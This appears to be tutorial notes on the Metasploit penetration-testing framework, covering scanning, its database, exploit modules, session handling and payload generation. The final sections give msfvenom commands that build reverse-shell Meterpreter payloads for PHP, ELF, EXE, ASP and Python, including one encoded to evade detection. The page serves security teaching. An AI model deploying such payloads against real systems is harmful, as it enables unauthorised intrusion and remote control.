Skip to content

Metasploit Exploitation

Introduction to Metasploit

  • Purpose: Metasploit is a powerful penetration testing framework that provides a comprehensive set of tools for vulnerability scanning, exploitation, and post-exploitation. It streamlines the process of identifying and exploiting security weaknesses in various systems and applications.
  • Features:
    • Scanning Modules: A wide range of modules for scanning target systems and networks to identify open ports, services, and vulnerabilities. These modules cover various protocols and services, including TCP, UDP, SMB, and more.
    • Database: A centralized database for storing and managing information about your targets, services, vulnerabilities, and scan results. This facilitates efficient organization and tracking of penetration testing activities, especially in larger engagements.
    • Exploit Modules: A vast collection of exploit modules that target known vulnerabilities in various operating systems, applications, and devices. These modules automate the process of exploiting vulnerabilities to gain access to target systems.
    • msfvenom: A versatile tool for generating payloads in various formats (e.g., executables, scripts, shellcode) for different platforms (e.g., Windows, Linux, macOS). These payloads can be used to establish connections with compromised systems.
    • Meterpreter: An advanced payload that provides a powerful and interactive shell on compromised systems. Meterpreter offers a wide range of post-exploitation capabilities, including file system navigation, process manipulation, privilege escalation, and pivoting.

Port Scanning

  • Modules: Metasploit offers a variety of port scanning modules that can be discovered using the search portscan command. Some commonly used modules include:
    • auxiliary/scanner/portscan/tcp: Performs a TCP connect scan.
    • auxiliary/scanner/portscan/syn: Conducts a stealthier TCP SYN scan.
    • auxiliary/scanner/portscan/udp_sweep: Scans for common UDP services.
  • Options: Port scanning modules typically have the following options:
    • CONCURRENCY: Controls the number of targets scanned simultaneously. Increasing this value can speed up scans but may also increase the likelihood of detection.
    • PORTS: Specifies the port range to scan. Unlike Nmap's default behavior, Metasploit scans the specified port numbers directly.
    • RHOSTS: Defines the target host(s) or network range. Can be a single IP, a range, or a CIDR block.
    • THREADS: Sets the number of concurrent threads used for scanning. Higher thread counts generally result in faster scans.
  • Nmap Integration: Metasploit allows you to execute Nmap scans directly from the msfconsole using the nmap command, providing a familiar interface for those accustomed to Nmap.
  • UDP Scanning: The auxiliary/scanner/discovery/udp_sweep module scans for common UDP services like DNS, NTP, and NetBIOS. UDP scans can be slower and less reliable than TCP scans due to the lack of connection establishment.
  • SMB Scanning: Metasploit provides modules for enumerating SMB shares (smb_enumshares) and identifying SMB versions (smb_version). These are particularly useful in corporate environments where SMB is prevalent.
  • NetBIOS Scanning: NetBIOS scans can reveal valuable information about systems on a network, including their roles (e.g., file server, domain controller) and potentially shared resources.

Metasploit Database

  • Purpose: The Metasploit database serves as a central repository for storing and managing data related to your penetration testing activities. This includes information about target hosts, services, vulnerabilities, and scan results.
  • Starting the Database:
    • Ensure the PostgreSQL service is running: systemctl start postgresql
    • Initialize the Metasploit database: msfdb init This creates the necessary database schema and user accounts.
  • Checking Database Status: The db_status command displays the connection status of the Metasploit database.
  • Workspaces: Workspaces allow you to organize your projects and targets within the database. You can create separate workspaces for different clients, engagements, or teams.
    • workspace: Lists available workspaces.
    • workspace -a [name]: Creates a new workspace.
    • workspace -d [name]: Deletes a workspace.
    • workspace [name]: Switches to a different workspace.
  • Database Commands: The help command within msfconsole displays a list of database backend commands, including:
    • db_nmap: Executes an Nmap scan and automatically stores the results in the database.
    • hosts: Lists all hosts stored in the database.
    • services: Lists all services identified on target hosts.
    • hosts -R: Automatically populates the RHOSTS option with hosts from the database.
    • services -S: Searches for specific services within the database.

Vulnerability Scanning

  • Modules: Metasploit offers a variety of vulnerability scanning modules that target specific vulnerabilities or classes of vulnerabilities.
    • Example: auxiliary/scanner/smb/smb_ms17_010: Checks for the MS17-010 vulnerability (EternalBlue) in Windows systems.
  • Searching for Modules: Use the search command to find relevant modules based on keywords (e.g., search vnc to find VNC-related modules).
  • Module Information: The info command provides detailed information about a module, including its description, options, and references.

Exploitation

  • Exploit Modules: Metasploit's core strength lies in its vast collection of exploit modules. These modules automate the process of exploiting known vulnerabilities to gain access to target systems.
  • Payloads: Each exploit module has a set of compatible payloads. Payloads are the code that will be executed on the target system upon successful exploitation.
    • show payloads: Lists the available payloads for the selected exploit.
    • set payload [number]: Selects the desired payload.
  • Setting Options: Exploit modules have various options that need to be configured before execution.
    • show options: Displays the available options for the selected exploit and payload.
    • set [option] [value]: Sets the value of an option (e.g., set RHOSTS 192.168.1.100).
  • Running Exploits: The exploit command executes the selected exploit module with the configured options.
  • Session Management:
    • CTRL+Z: Backgrounds the current session, allowing you to interact with other sessions or perform other tasks.
    • CTRL+C: Aborts the current session.
    • sessions: Lists all active sessions.
    • sessions -i [id]: Interacts with a specific session.
    • sessions -h: Displays the help menu for session management commands.

Msfvenom

  • Purpose: msfvenom is a command-line tool used to generate payloads in various formats for different platforms. These payloads can be used to establish connections with target systems, often as part of an exploitation process.
  • Listing Payloads: The msfvenom -l payloads command displays a list of all available payloads within the Metasploit framework.
  • Output Formats: msfvenom --list formats shows the supported output formats for payloads, including:
    • raw: Raw payload (shellcode).
    • exe: Windows executable.
    • elf: Linux executable.
    • php: PHP script.
    • asp: ASP script.
    • And many more.
  • Encoders: Encoders are used to transform payloads to evade detection or bypass security mechanisms.
    • -e [encoder]: Specifies the encoder to use (e.g., -e php/base64 to encode a PHP payload with Base64).

  • Example (PHP):

    msfvenom -p php/meterpreter/reverse_tcp LHOST=10.10.186.44 LPORT=4444 -f raw -e php/base64 > payload.php

    This command generates a PHP Meterpreter payload, encodes it with Base64, and saves it to payload.php.

Handlers

  • Purpose: Handlers are used to listen for incoming connections from payloads, such as reverse shells or Meterpreter callbacks. They establish interactive sessions with compromised systems.
  • Module: The exploit/multi/handler module is a versatile handler that can handle various types of payloads.
  • Setting Options:
    • set payload [payload]: Specifies the payload that the handler should expect (e.g., set payload php/reverse_php).
    • set LHOST [ip]: Sets the IP address of your attacking machine where the handler will listen.
    • set LPORT [port]: Sets the port number where the handler will listen.
  • Running the Handler: The run command starts the handler to listen for incoming connections.

Other Msfvenom Payloads

- Linux (ELF):

```msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=... LPORT=... -f elf > rev_shell.elf```
Generates a Linux executable payload in ELF format.

  • Windows (EXE):

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=... LPORT=... -f exe > rev_shell.exe

    Creates a Windows executable payload. - PHP:

    msfvenom -p php/meterpreter_reverse_tcp LHOST=... LPORT=... -f raw > rev_shell.php

    Generates a PHP Meterpreter payload. - ASP:

    msfvenom -p windows/meterpreter/reverse_tcp LHOST=... LPORT=... -f asp > rev_shell.asp

    Creates an ASP Meterpreter payload. - Python:

    msfvenom -p cmd/unix/reverse_python LHOST=... LPORT=... -f raw > rev_shell.py

    Generates a Python reverse shell payload.